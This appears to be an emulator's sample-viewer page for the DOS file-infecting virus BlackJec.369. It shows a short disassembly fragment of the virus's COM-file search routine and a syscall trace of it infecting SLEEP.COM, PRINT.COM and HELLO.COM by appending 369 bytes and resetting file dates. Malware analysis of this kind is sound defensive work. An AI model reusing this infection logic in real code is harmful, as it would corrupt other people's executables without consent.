Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.369

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:08:34.110905092Z 42 PC: 12a7a | Get date 0x12a7a: mov word ptr [0xf2], dx
0x12a7e: mov word ptr [0xf4], cx
0x12a82: stc
0x12a83: mov dx, 0x268
0x12a86: mov ah, 0x4e
0x12a88: mov cx, 0x20
0x12a8b: int 0x21
0x12a8d: or ax, ax
0x12a8f: je 0x12a94
0x12a91: jmp 0x12b69
0x12a94: mov ah, 0x2f
0x12a96: int 0x21
0x12a98: mov ax, word ptr es:[bx + 0x1a]
0x12a9c: mov word ptr [0xfc], ax
0x12a9f: add bx, 0x1e
0x12aa2: mov word ptr [0xfe], bx
0x12aa6: mov ax, 0x4f43
0x12aa9: sub ax, word ptr [0x9e]
0x12aad: jne 0x12ab2
0x12aaf: jmp 0x12b5d
2018-12-17T23:08:34.113798481Z 78 PC: 12a8d | Find first file
2018-12-17T23:08:34.121455993Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T23:08:34.12420523Z 43 PC: 12aee | Set date
2018-12-17T23:08:34.128548494Z 61 PC: 12af6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:08:34.141981713Z 63 PC: 12b04 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T23:08:34.149813683Z 60 PC: 12b41 | Create or truncate file
2018-12-17T23:08:34.169692467Z 64 PC: 12b53 | Write file or device (Write 776 bytes on handle 6)
2018-12-17T23:08:34.180078719Z 62 PC: 12b57 | Close file
2018-12-17T23:08:34.189865764Z 79 PC: 12b62 | Find next file
2018-12-17T23:08:34.193395027Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T23:08:34.195379988Z 43 PC: 12aee | Set date
2018-12-17T23:08:34.200678847Z 61 PC: 12af6 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:34.216233924Z 63 PC: 12b04 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T23:08:34.22454213Z 60 PC: 12b41 | Create or truncate file
2018-12-17T23:08:34.238698839Z 64 PC: 12b53 | Write file or device (Write 396 bytes on handle 7)
2018-12-17T23:08:34.243177767Z 62 PC: 12b57 | Close file
2018-12-17T23:08:34.252432713Z 79 PC: 12b62 | Find next file
2018-12-17T23:08:34.256997853Z 47 PC: 12a98 | Get disk transfer address
2018-12-17T23:08:34.258941246Z 43 PC: 12aee | Set date
2018-12-17T23:08:34.263093059Z 61 PC: 12af6 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:34.276762622Z 63 PC: 12b04 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T23:08:34.284888145Z 60 PC: 12b41 | Create or truncate file
2018-12-17T23:08:34.298498957Z 64 PC: 12b53 | Write file or device (Write 461 bytes on handle 8)
2018-12-17T23:08:34.303023361Z 62 PC: 12b57 | Close file
2018-12-17T23:08:34.313294746Z 43 PC: 12b75 | Set date
2018-12-17T23:08:34.317426353Z 76 PC: 12a45 | Terminate with return code (Return code = '0')